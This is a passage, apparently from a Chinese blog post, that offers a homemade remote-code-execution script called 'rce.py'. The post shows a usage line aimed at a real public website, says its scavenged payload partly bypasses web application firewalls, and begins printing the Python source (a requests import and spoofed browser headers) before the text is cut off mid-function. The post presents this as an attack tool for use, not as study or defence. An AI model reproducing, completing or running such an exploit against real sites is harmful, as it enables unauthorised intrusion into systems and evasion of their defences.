使用方法
python3 rce.py http://www.baidu.com
![20017676-cc85b789feabfa26.png](https://i-blog.csdnimg.cn/blog_migrate/a5e538f545a80e7d13c8ab45d0365ee1.png)
image
payload是捡的,可以一定程度上bypass waf
源码
随手撸的
import requests
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
}
def ex